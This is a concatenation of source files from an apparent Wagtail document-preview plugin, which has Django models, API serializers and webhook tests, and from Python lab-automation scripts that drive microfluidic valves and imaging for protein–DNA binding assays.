repo_name | path | text |
|---|---|---|
mikiec84/wagtail-filepreviews | wagtaildocs_previews/models.py | from __future__ import unicode_literals
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from filepreviews import FilePreviews
from jsonfield import JSONField
from model_utils import FieldTracker
from wagtail.contrib.settings.models import BaseSetting, register_setting
from wagtail.core.models import Site
from wagtail.documents.models import AbstractDocument
from .settings import previews_options_callback
@register_setting
class FilePreviewsSettings(BaseSetting):
api_key = models.CharField(max_length=255)
api_secret = models.CharField(max_length=255)
class Meta:
verbose_name = 'FilePreviews'
@property
def is_enabled(self):
return self.api_key and self.api_secret
class AbstractPreviewableDocument(AbstractDocument):
preview_data = JSONField(blank=True, null=True)
class Meta:
abstract = True
verbose_name = _('document')
class PreviewableDocument(AbstractPreviewableDocument):
admin_form_fields = [
'title',
'file',
'collection',
'tags',
'preview_data'
]
tracker = FieldTracker(fields=['file'])
@receiver(post_save, sender=PreviewableDocument)
def document_save(sender, instance, created, **kwargs):
previous_file = instance.tracker.previous('file')
file_changed = previous_file != instance.file
    # The created/not-created branches were identical; the preview should be
    # (re)generated whenever the file has changed.
    should_generate_preview = file_changed
if not should_generate_preview:
return
site = Site.objects.get(is_default_site=True)
settings = FilePreviewsSettings.for_site(site)
if settings.is_enabled:
fp = FilePreviews(
api_key=settings.api_key,
api_secret=settings.api_secret
)
host_url = site.root_url
document_url = '{}{}'.format(host_url, instance.url)
callback_url = '{}{}'.format(host_url, reverse('filepreviews_webhook'))
options = {
'callback_url': callback_url,
'data': {
'document_id': instance.pk
}
}
options.update(previews_options_callback(instance))
fp.generate(document_url, **options)
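# Hedged usage sketch (not part of the original module): previews_options_callback,
# imported from .settings above, is called with the document instance and its
# return value is merged into `options` via options.update(). A minimal callback
# might look like the following; the option keys ('metadata', 'sizes') are
# illustrative, not confirmed FilePreviews API names.
#
# def previews_options_callback(instance):
#     return {
#         'metadata': ['exif'],
#         'sizes': ['600x'],
#     }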
|
mikiec84/wagtail-filepreviews | wagtaildocs_previews/tests/test_views.py | import json
from django.test import TestCase
from django.urls import reverse
from wagtaildocs_previews.models import PreviewableDocument
class TestWebhookView(TestCase):
def setUp(self):
self.url = reverse('filepreviews_webhook')
self.document = PreviewableDocument.objects.create(
title='Test document'
)
def test_post_returns_success(self):
post_data = {
'user_data': {
'document_id': self.document.id
}
}
response = self.client.post(
self.url, json.dumps(post_data), content_type='application/json'
)
self.assertEqual(response.content.decode('utf8'), '{"success": true}')
def test_post_updates_document(self):
post_data = {
'user_data': {
'document_id': self.document.id
}
}
self.client.post(
self.url, json.dumps(post_data), content_type='application/json'
)
document = PreviewableDocument.objects.get(pk=self.document.pk)
self.assertEqual(document.preview_data, post_data)
|
mikiec84/wagtail-filepreviews | wagtaildocs_previews/endpoints.py | from wagtail.documents.api.v2 import endpoints
from .serializers import DocumentSerializer
class DocumentsAPIEndpoint(endpoints.DocumentsAPIEndpoint):
base_serializer_class = DocumentSerializer
body_fields = endpoints.DocumentsAPIEndpoint.body_fields + ['preview_data']
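# Hedged usage sketch: registering this endpoint with a Wagtail v2 API router,
# following the standard Wagtail pattern (the router name and URL namespace
# below are illustrative, not taken from this repo):
#
# from wagtail.api.v2.router import WagtailAPIRouter
# api_router = WagtailAPIRouter('wagtailapi')
# api_router.register_endpoint('documents', DocumentsAPIEndpoint)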
|
mikiec84/wagtail-filepreviews | wagtaildocs_previews/serializers.py | from rest_framework.serializers import JSONField
from wagtail.documents.api.v2 import serializers
class DocumentSerializer(serializers.DocumentSerializer):
preview_data = JSONField(read_only=True)
|
mikiec84/wagtail-filepreviews | wagtaildocs_previews/tests/urls.py | from __future__ import absolute_import, unicode_literals
from django.conf.urls import include, url
from wagtail.admin import urls as wagtailadmin_urls
from wagtail.core import urls as wagtail_urls
from wagtaildocs_previews import urls as wagtaildocs_urls
urlpatterns = [
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^documents/', include(wagtaildocs_urls)),
url(r'', include(wagtail_urls)),
]
|
FordyceLab/RunPack-STAMMP | runpack-stammp/valvecontrol.py | # title : valvecontrol.py
# description : Valve control for RunPack experimental acquisition
# authors : <NAME>
# credits : <NAME>
# date : 20180520
# version update : 20200913
# version : 0.1.1
# python_version : 2.7
import time
from acqpack import gui
from runpack.io import HardwareInterface as hi
from runpack.io import ExperimentalHarness as eh
################################################################################
def launchGui():
"""Wrapper for AcqPack manifold-controlling widget.
Args:
None
Returns:
None
"""
gui.manifold_control(hi.m, hi.valveReferenceIndex)
def open(reference, valveName, logging = True):
"""Opens a valve.
Args:
reference (str): valvemap reference name
valveName (str): Valve name as per valvemap
        logging (bool): flag to log valve state change
Returns:
None
"""
hi.m.open(reference, valveName)
if logging:
eh.valvelogger.info('Opened {}'.format(valveName))
def close(reference, valveName, logging = True):
"""Closes a valve.
Args:
reference (str): valvemap reference name
valveName (str): Valve name as per valvemap
        logging (bool): flag to log valve state change
Returns:
None
"""
hi.m.close(reference, valveName)
if logging:
eh.valvelogger.info('Closed {}'.format(valveName))
def openValves(devices, valves, reference = hi.valveReferenceIndex, logging = True):
"""Opens specified valves of specified devices.
If one valve is given, that valve is opened on all devices.
Args:
        devices (list): list of devices (e.g. ['d1', 'd2', 'd3'])
        valves (list): list of valves (e.g. ['bb'] or ['bb', 'na', 'out'])
Returns:
None
"""
dnums = [dname[-1] for dname in devices]
for dnum in dnums:
for valve in valves:
time.sleep(0.005)
open(reference, valve+str(dnum), logging = False)
if logging:
eh.valvelogger.info('Opened Valve(s) {} for Device(s) {}'.format(valves, devices))
def closeValves(devices, valves, reference= hi.valveReferenceIndex, logging = True):
"""Closes specified valves of specified devices.
If one valve is given, that valve is closed on all devices.
Args:
        devices (list | tuple): list of devices (e.g. ['d1', 'd2', 'd3'])
        valves (list | tuple): list of valves (e.g. ['bb'] or ['bb', 'na', 'out'])
Returns:
None
"""
dnums = [dname[-1] for dname in devices]
for dnum in dnums:
for valve in valves:
time.sleep(0.005)
close(reference, valve+str(dnum), logging = False)
if logging:
eh.valvelogger.info('Closed Valve(s) {} for Device(s) {}'.format(valves, devices))
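# Hedged usage sketch (hypothetical device/valve names): a valve 'bb' on
# device 'd1' resolves to valvemap entry 'bb1', since the device digit is
# appended to each valve name above.
#
# openValves(['d1', 'd2'], ['bb', 'na'])   # opens bb1, na1, bb2, na2
# closeValves(['d1', 'd2'], ['bb', 'na'])  # closes them again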
def returnToSafeState(devices, valves = 'all', reference = 'chip', logging = True):
"""Closes all valving of specified type
If valves = 'all', shuts all inlets/outlets, depresses buttons, sandwiches,
and necks
Note: flowValves ['w','bb','na','ph','ext1','ext2','prot', 'hep','out','in']
controlValves ['neck','b1','b2','s1','s2']
Args:
devices (list | tuple): list of devices to return to safe state (name
only, e.g. 'd1')
valves (str): which valving to shut ('all', 'flow', or 'control')
Returns:
None
"""
    if valves == 'all':
        # closeValves already iterates over all given devices, so the original
        # extra per-device loop re-closed every valve len(devices) times.
        closeValves(devices, hi.flowValves, logging = False)
        closeValves(devices, hi.controlValves, logging = False)
        if logging:
            eh.valvelogger.info('Closed all valves for devices {}'.format(devices))
    elif valves == 'flow':
        closeValves(devices, hi.flowValves, logging = False)
        if logging:
            eh.valvelogger.info('Closed flow valves for devices {}'.format(devices))
    elif valves == 'control':
        closeValves(devices, hi.controlValves, logging = False)
        if logging:
            eh.valvelogger.info('Closed control valves for devices {}'.format(devices)) |
FordyceLab/RunPack-STAMMP | runpack-stammp/tfMITOMIProtocols.py | # title : tfMITOMIProtocols.py
# description : tf-MITOMI-specific protocols for experimental acquisition notebook
# authors : <NAME>, <NAME>, <NAME>
# credits : <NAME>
# date : 201711015
# version update : 20200913
# version : v0.1
# python_version : 2.7
from runpack import valvecontrol as vc
from runpack import imagingcontrol as ic
from runpack.io import ExperimentalHarness as eh
from Queue import Queue
import numpy as np
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.schedulers.blocking import BlockingScheduler
import time
def flowOligoStartAssay(deviceName, substrateInput, bufferInput, KineticAcquisition, equilibrationTime = 600, treeFlushTime = 20, bindingTime = 1800, washoutTime = 600, postEquilibImageChanExp = {'5cy5':[30]}, postWashImageChanExp = {'5cy5':[30], '4egfp':[500]}, performImaging = True, sendToQueue = False):
    """
    Performs a single-device oligo binding assay: flushes the inlet tree,
    equilibrates the chip with oligo, binds oligo to the buttons (optionally
    with kinetic imaging), takes a prewash Cy5 image, washes with buffer, and
    takes postwash Cy5/eGFP images.
    """
eh.scriptlogger.info('>> Flowing oligo, starting assay ' + 'for device ' + deviceName + ' in lines ' + str(substrateInput))
# Flush the inlet tree
eh.scriptlogger.info('The inlet tree wash started for oligo in ' + str(substrateInput))
vc.returnToSafeState([deviceName])
vc.openValves([deviceName], [substrateInput[:-1], 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for oligo in ' + str(substrateInput))
#Expose chip to oligo, equilibrate for equilibrationTime
eh.scriptlogger.info('Chip equilibration started for substrate in ' + str(substrateInput))
vc.closeValves([deviceName], ['w'])
vc.openValves([deviceName], ['in', 'out', 's1', 's2'])
time.sleep(equilibrationTime)
eh.scriptlogger.info('Chip equilibration done for substrate in ' + str(substrateInput))
#Close things to prep for assay, and open buttons
vc.closeValves([deviceName], [substrateInput[:-1], 'in', 'out', 's1', 's2'])
time.sleep(0.5)
vc.openValves([deviceName], ['b1', 'b2'])
#Start the assay
if performImaging:
        eh.scriptlogger.info('Binding oligo to buttons, starting kinetic acquisition ' + str(substrateInput))
        # NOTE: sendToQueue was undefined in the original source; it is assumed
        # to be a queued-scanning flag and is exposed as a keyword argument above.
        KineticAcquisition.startAssay(eh.rootPath, eh.posLists[deviceName], scanQueueFlag = sendToQueue)
else:
eh.scriptlogger.info('Binding oligo to buttons, no kinetics' + str(substrateInput))
time.sleep(bindingTime)
# Obtain pre-wash Cy5 no matter what
ic.scan(eh.rootPath, postEquilibImageChanExp, deviceName, KineticAcquisition.note.replace(" ", "_")+'_PreWash_Quant', eh.posLists[deviceName], wrappingFolder = True)
    # Flush the inlet tree with wash buffer
eh.scriptlogger.info('The inlet tree wash started for buffer in ' + str(bufferInput))
vc.returnToSafeState([deviceName])
vc.openValves([deviceName], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for buffer in ' + str(bufferInput))
# Flow buffer through chip
vc.closeValves([deviceName], ['w'])
vc.closeValves([deviceName], ['b1', 'b2'])
time.sleep(0.5)
vc.openValves([deviceName], ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
vc.closeValves([deviceName], [bufferInput[:-1], 'in', 's1', 's2', 'out'])
ic.scan(eh.rootPath, postWashImageChanExp, deviceName, KineticAcquisition.note.replace(" ", "_")+'_PostWash_Quant', eh.posLists[deviceName], wrappingFolder = True)
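# Hedged usage sketch (hypothetical inlet and device names): inputs such as
# 'ph1' are valve-name + device-digit strings, because the code strips the
# trailing device digit with substrateInput[:-1] when flushing the tree.
#
# flowOligoStartAssay('d1', substrateInput='ph1', bufferInput='hep1',
#                     KineticAcquisition=kineticAcq, performImaging=False)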
def flowOligoStartAssaysConcurrent(deviceNames, substrateInputs, bufferInputs, notes, equilibrationTime = 600, treeFlushTime = 20, bindingTime = 1800,
washoutTime = 600, postEquilibImageChanExp = {'5cy5':[80]}, postWashImageChanExp = {'5cy5':[1500], '4egfp':[500]}):
"""
Performs binding assay for a single oligo concentration.
Procedure:
1) Flush inlet tree
2) Flow oligo onto device
3) Close sandwiches, open buttons, wait 30 min
4) Prewash Cy5 imaging
5) Close buttons, wash 10 min
6) Postwash Cy5 and eGFP imaging
Arguments
(list) deviceNames: list of the name of devices
(list) substrate inputs: list of input for DNA on each device
(list) buffer inputs: PBS inlets for both devices
(list) notes: oligo identities, in order of device name
equilibrationTime: time (sec) for equilibration of protein and DNA (in seconds), standard is 30 minutes
treeFlushTime: time (sec) for flushing inlet tree of oligo before introducing onto device
bindingTime: time (sec) for equilibrating TF-DNA interaction
washoutTime: time (sec) for washing through buffer post binding measurement.
postEquilibImageChanExp: prewash Cy5 image channel and exposure settings
postWashImageChanExp: channels and exposures for postwash eGFP and Cy5 imaging
"""
eh.scriptlogger.info('>> Flowing oligo, starting assay for device {} in lines {}'.format(str(deviceNames), str(substrateInputs)))
# Flush the inlet tree
eh.scriptlogger.info('The inlet tree wash started for oligo in {}'.format(str(substrateInputs)))
vc.returnToSafeState(deviceNames)
for device, substrateInput in list(zip(deviceNames, substrateInputs)):
vc.openValves([device], [substrateInput[:-1], 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for oligo in ' + str(substrateInput))
#Flow oligo onto device, equilibrate for equilibrationTime
eh.scriptlogger.info('Chip equilibration started for substrate in ' + str(substrateInputs))
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(equilibrationTime)
eh.scriptlogger.info('Chip equilibration done for substrate in ' + str(substrateInputs))
#Close things to prep for assay, and open buttons
for device, substrateInput in list(zip(deviceNames, substrateInputs)):
vc.closeValves([device], [substrateInput[:-1], 'in', 'out', 's1', 's2'])
time.sleep(1)
vc.openValves(deviceNames, ['b1', 'b2'])
eh.scriptlogger.info('Binding oligo to buttons, no kinetics' + str(substrateInputs))
time.sleep(bindingTime)
# Obtain pre-wash Cy5 no matter what
for device, note in list(zip(deviceNames, notes)):
ic.scan(eh.rootPath, postEquilibImageChanExp, device, note.replace(" ", "_")+'_PreWash_Quant', eh.posLists[device], wrappingFolder = True)
    # Flush the inlet tree with wash buffer
eh.scriptlogger.info('The inlet tree wash started for buffers in ' + str(bufferInputs))
vc.returnToSafeState(deviceNames)
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for buffer in ' + str(bufferInputs))
# Flow buffer through chip
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
vc.closeValves(deviceNames, ['w'])
vc.closeValves(deviceNames, ['b1', 'b2'])
time.sleep(0.5)
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
eh.scriptlogger.info('Done flowing buffer through devices for washout ' + str(bufferInputs))
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1], 'in', 'out'])
for device, note in list(zip(deviceNames, notes)):
ic.scan(eh.rootPath, postWashImageChanExp, device, note.replace(" ", "_")+'_PostWash_Quant', eh.posLists[device], wrappingFolder = True)
vc.returnToSafeState(deviceNames)
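# Hedged usage sketch (hypothetical names), running the concurrent assay on
# two devices with per-device oligo and buffer inlets:
#
# flowOligoStartAssaysConcurrent(['d1', 'd2'],
#                                substrateInputs=['ph1', 'ph2'],
#                                bufferInputs=['hep1', 'hep2'],
#                                notes=['oligoA_10nM', 'oligoB_10nM'])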
def trypsinDigest(deviceNames, bufferInputs, trypInputs, bBSAInputs, assayBufferInputs, washoutTime = 600, treeFlushTime=30, trypsinWashTime = 900):
"""
Trypsin digest post protein-binding
Procedure:
1. Flow buffer
2. Flow trypsin 15 min
3. Wash buffer for 10 min
4. Flow bBSA for 15 minutes
5. Wash buffer for 10 minutes
Arguments:
(list) deviceNames: list of device names ()
(list) bufferInputs: list of buffer inputs
(list) trypInputs: list of trypsin inputs
(list) bBSAInputs: list of bBSA inputs
(int) washoutTime: time (seconds) buffer flowed through
(int) treeFlushTime: time (seconds) reagent flushed to waste to remove air
(int) trypsinWashTime: time (seconds) of flowing trypsin and bBSA in device
Returns:
None
"""
#enforce safe state (everything shut)
vc.returnToSafeState(deviceNames)
# Flow buffer through chip
eh.scriptlogger.info('Trypsin Digest')
# open buffer lines to waste
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
eh.scriptlogger.info('Done flowing buffer through devices for washout ' + str(bufferInputs))
vc.closeValves(deviceNames, ['in'])
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1], 'w'])
#flow trypsin through device
eh.scriptlogger.info('Started flowing trypsin to waste')
for device, bufferInput in list(zip(deviceNames, trypInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing trypsin through devices for protein cleaning ' + str(trypInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(trypsinWashTime)
eh.scriptlogger.info('Done flowing trypsin through devices ' + str(trypInputs))
vc.closeValves(deviceNames, ['in'])
for device, bufferInput in list(zip(deviceNames, trypInputs)):
vc.closeValves([device], [bufferInput[:-1], 'w'])
#wash trypsin away
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
eh.scriptlogger.info('Done flowing buffer through devices for washout ' + str(bufferInputs))
vc.closeValves(deviceNames, ['in'])
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1]])
#wash bBSA in device
eh.scriptlogger.info('Started bBSA to waste')
for device, bBSAInput in list(zip(deviceNames, bBSAInputs)):
vc.openValves([device], [bBSAInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing bBSA through devices for surface regeneration ' + str(bBSAInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(trypsinWashTime)
eh.scriptlogger.info('Done flowing bBSA through devices ' + str(bBSAInputs))
vc.closeValves(deviceNames, ['in'])
for device, bufferInput in list(zip(deviceNames, bBSAInputs)):
vc.closeValves([device], [bufferInput[:-1], 'w'])
#flow buffer through to wash away bBSA
# for device, bufferInput in list(zip(deviceNames, bufferInputs)):
# vc.openValves([device], [bufferInput[:-1], 'w'])
# time.sleep(treeFlushTime)
# vc.closeValves(deviceNames, ['w'])
# eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
# vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
# time.sleep(washoutTime)
# eh.scriptlogger.info('Done flowing buffer through devices for washout ' + str(bufferInputs))
# vc.closeValves(deviceNames, ['in'])
# for device, bufferInput in list(zip(deviceNames, bufferInputs)):
# vc.closeValves([device], [bufferInput[:-1], 'w'])
#let protein sit in assay buffer
eh.scriptlogger.info('Started assay buffer')
for device, bufferInput in list(zip(deviceNames, assayBufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing assay buffer through devices for equilibration ' + str(assayBufferInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(trypsinWashTime)
eh.scriptlogger.info('Done flowing assay buffer through devices ' + str(assayBufferInputs))
vc.closeValves(deviceNames, ['in'])
for device, bufferInput in list(zip(deviceNames, assayBufferInputs)):
vc.closeValves([device], [bufferInput[:-1], 'w'])
vc.returnToSafeState(deviceNames)
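# Hedged usage sketch (hypothetical inlet names, following the same
# valve-name + device-digit convention) for regenerating two devices after a
# binding assay:
#
# trypsinDigest(['d1', 'd2'], bufferInputs=['hep1', 'hep2'],
#               trypInputs=['ext11', 'ext12'], bBSAInputs=['ext21', 'ext22'],
#               assayBufferInputs=['na1', 'na2'])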
def removeOligo(deviceNames, bufferInputs, openTime = 120, washoutTime = 300, treeFlushTime=20, washoutSteps = 2):
"""
Refreshes a device following an oligo titration series.
Procedure:
1. Flow buffer
2. Shut sandwiches, open buttons (wait 2 min)
3. Shut buttons, open sandwiches (wait 2 min)
4. Flow buffer 5 min and repeat 2-3
Arguments:
(list) deviceNames: list of device names ()
(list) bufferInputs: list of buffer inputs
(int) openTimes: time (seconds) buttons remain open during oligo release step
(int) washoutTime: time (seconds) buffer flowed through to remove oligo
(int) treeFlushTime: time (seconds) reagent flushed to waste to remove air
(int) washoutSteps: number of times to run Procedure
Returns:
None
"""
#enforce safe state (everything shut)
vc.returnToSafeState(deviceNames)
# Flow buffer through chip
eh.scriptlogger.info('Oligo removal/protein refresh')
# open buffer lines to waste
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(300)
eh.scriptlogger.info('Done flowing buffer through devices for washout ' + str(bufferInputs))
for i in range(washoutSteps):
eh.scriptlogger.info('Started washout step {} of {}'.format(i+1, washoutSteps))
vc.closeValves(deviceNames, ['s1','s2']) #close sandwiches
time.sleep(5)
vc.openValves(deviceNames, ['b1','b2']) #open buttons
eh.scriptlogger.info('Closed sandwiches and opened buttons' + str(deviceNames))
time.sleep(openTime)
vc.closeValves(deviceNames, ['b1', 'b2'])
time.sleep(5)
vc.openValves(deviceNames, ['s1','s2'])
eh.scriptlogger.info('Closed buttons and opened sandwiches {} for {}s'.format(str(deviceNames), washoutTime))
time.sleep(washoutTime)
time.sleep(washoutTime)
eh.scriptlogger.info('Finished additional washout ' + str(bufferInputs))
eh.scriptlogger.info('Finished Oligo Removal/Protein refresh')
vc.returnToSafeState(deviceNames)
def dissociationConcurrent(deviceNames, bufferInputs, notes, points=20, dutyCycle = 1, washoutTime = 600, exposures = {'5cy5':[1500], '4egfp': [500]}):
"""
Performs dissociation for oligo post binding assay.
Procedure:
1) Flow buffer onto device
2) shut sandwich values (wait 5 seconds)
3) open buttons (wait for duty cycle duration)
4) shut buttons
5) wash device
6) Cy5 and eGFP imaging
Arguments:
(list) deviceNames: list of the name of devices
(list) bufferInputs: list of the input for wash buffer on each device
(list) notes: oligo identities, in order of device name
points: number of measurements to be taken
dutyCycle: time (sec) button should remain open
washoutTime: time (sec) buffer is flowed onto device
exposures: channels and exposure for kinetic acquisition
"""
eh.scriptlogger.info('>> Beginning dissociation curves for device {} with duty cycle {} seconds'.format(str(deviceNames), str(dutyCycle)))
vc.returnToSafeState(deviceNames)
#open in and out valves
vc.openValves(deviceNames,['in','out'])
for x in xrange(0, points):
eh.scriptlogger.info('>> Beginning time point {} of {}'.format(str(x+1),str(points)))
eh.scriptlogger.info('Shutting sandwich valves')
vc.closeValves(deviceNames,['s1','s2'])
time.sleep(5)
eh.scriptlogger.info('Opening button valves')
vc.openValves(deviceNames,['b1','b2'])
time.sleep(dutyCycle)
vc.closeValves(deviceNames,['b1','b2'])
eh.scriptlogger.info('Shut button valves')
time.sleep(5)
        eh.scriptlogger.info('Opening sandwich valves for wash')
vc.openValves(deviceNames, ['s1','s2'])
time.sleep(5)
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1]])
time.sleep(washoutTime)
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1]])
eh.scriptlogger.info('Finished flowing buffer through devices for washout ' + str(bufferInputs))
for device, note in list(zip(deviceNames, notes)):
ic.scan(eh.rootPath, exposures, device, note.replace(" ", "_")+'_KineticAcquisition_Point_'+str(x), eh.posLists[device], wrappingFolder = True)
vc.returnToSafeState(deviceNames)
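# Hedged usage sketch (hypothetical names): 20 dissociation time points with
# 1 s button openings and 10 min washes between points.
#
# dissociationConcurrent(['d1', 'd2'], bufferInputs=['hep1', 'hep2'],
#                        notes=['oligoA', 'oligoB'], points=20,
#                        dutyCycle=1, washoutTime=600)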
def continuousImagingbyRaster(deviceNames, notes, exposures = {'5cy5': [100], '4egfp': [500]}, incubationTime = 5400):
"""
Raster over devices and take images with given exposures until incubation time is reached
returns dictionary of scan record dataframes
"""
eh.scriptlogger.info('Imaging continuously by rastering across device(s) during DNA incubation')
startTime = time.time()
count = 0
scan_records = {}
timeElapsed = 0
while timeElapsed < incubationTime:
for device, note in list(zip(deviceNames, notes)):
scan_records[(count, device)] = ic.scan(eh.rootPath, exposures, device, note.replace(" ", "_")+'_BindingRate_Point_'+str(count), eh.posLists[device], wrappingFolder = True)
count += 1
timeElapsed = time.time() - startTime
return scan_records
def flowProteinandDNA(deviceNames, bufferInputs, DNAInputs, proteinInputs, proteinFlowTime=1800, washoutTime=600, treeFlushTime=20, incubationTime=3600):
"""
intended for BET-seq.
following surface chemistry, flow protein for 30 mins.
then wash out with PBS for 10 mins.
then flow DNA for 10 mins.
then allow DNA to bind for 60 mins.
close buttons.
"""
#enforce safe state (everything shut)
vc.returnToSafeState(deviceNames)
#flow protein to waste, then over chip
for device, proteinInput in list(zip(deviceNames, proteinInputs)):
vc.openValves([device], [proteinInput[:-1], 'w'])
eh.scriptlogger.info('Started flowing protein through devices ' + str(proteinInputs))
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out', 's1', 's2', 'b1', 'b2'])
time.sleep(proteinFlowTime)
for device, proteinInput in list(zip(deviceNames, proteinInputs)):
vc.closeValves([device], [proteinInput[:-1]])
vc.closeValves(deviceNames, ['in', 'out'])
eh.scriptlogger.info('Finished flowing protein through devices ' + str(proteinInputs))
# open buffer lines to waste
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out'])
time.sleep(washoutTime)
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1]])
vc.closeValves(deviceNames, ['in', 'out'])
eh.scriptlogger.info('Finished flowing buffer through devices for washout ' + str(bufferInputs))
# open DNA lines to waste
for device, DNAInput in list(zip(deviceNames, DNAInputs)):
vc.openValves([device], [DNAInput[:-1], 'w'])
eh.scriptlogger.info('Started flowing DNA through devices for binding ' + str(DNAInputs))
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out'])
time.sleep(washoutTime)
for device, DNAInput in list(zip(deviceNames, DNAInputs)):
vc.closeValves([device], [DNAInput[:-1]])
vc.closeValves(deviceNames, ['in', 'out'])
eh.scriptlogger.info('Finished flowing DNA through devices for binding ' + str(DNAInputs))
eh.scriptlogger.info('Allowing DNA to bind for %.1f minutes' % (incubationTime/60.0))
time.sleep(incubationTime)
vc.returnToSafeState(deviceNames)
def BETseqElute(deviceNames, bufferInputs, treeFlushTime=20):
"""
actuate buttons 300 times with 3 second button cycles under constant PBS flow
"""
#enforce safe state (everything shut)
vc.returnToSafeState(deviceNames)
# Flow buffer through chip
eh.scriptlogger.info('Elute bound DNA')
# open buffer lines to waste
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
# begin button actuations to elute DNA from device
dutyCycle = 3
numCycles = 300
for cycle in range(numCycles):
eh.scriptlogger.info('Cycle number ' + str(cycle+1))
vc.openValves(deviceNames,['b1','b2'])
time.sleep(dutyCycle)
vc.closeValves(deviceNames,['b1','b2'])
time.sleep(5)
vc.returnToSafeState(deviceNames)
def runAssaywithKinetics(deviceNames, notes, bufferInputs, competitorInputs, points, dutyCycle, washoutTime=600, prewashExposures={'5cy5':[200, 250]}, postwashExposures={'4egfp':[500],'5cy5':[3000]}, treeFlushTime=20, incubationTime=5400):
"""
start this script after letting DNA solubilize in reaction chamber
open buttons and begin imaging (low exposure times)
image continuously for 90 mins
close necks
take prewash image
close buttons
flow PBS for 10 min
take postwash images
flow competitor oligo, 10 min
run kinetics
"""
eh.scriptlogger.info('>> Starting TF-DNA binding assay')
# just to be safe, close everything (only necks should be open at this point)
vc.returnToSafeState(deviceNames)
# open buttons to begin binding and reopen necks
vc.openValves(deviceNames,['b1','b2','neck'])
# vc.openValves(deviceNames,['b1','b2'])
# image continuously for 90 mins (or specified incubation time)
### still working on this
# scan_records = continuousImagingbyRaster(deviceNames, notes, exposures=bindingExposures, incubationTime=incubationTime)
eh.scriptlogger.info('Letting oligo bind for %.1f minutes' % (incubationTime/60.0))
time.sleep(incubationTime)
# close neck valves and take prewash image
vc.closeValves(deviceNames,['neck'])
eh.scriptlogger.info('Finished binding, taking prewash images')
for device, note in list(zip(deviceNames, notes)):
prewash_note = note+'_PreWash'
ic.scan(eh.rootPath, prewashExposures, device, prewash_note, eh.posLists[device], wrappingFolder=True)
# close buttons, wash, and take postwash images
vc.closeValves(deviceNames,['b1','b2'])
# open buffer lines to waste
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
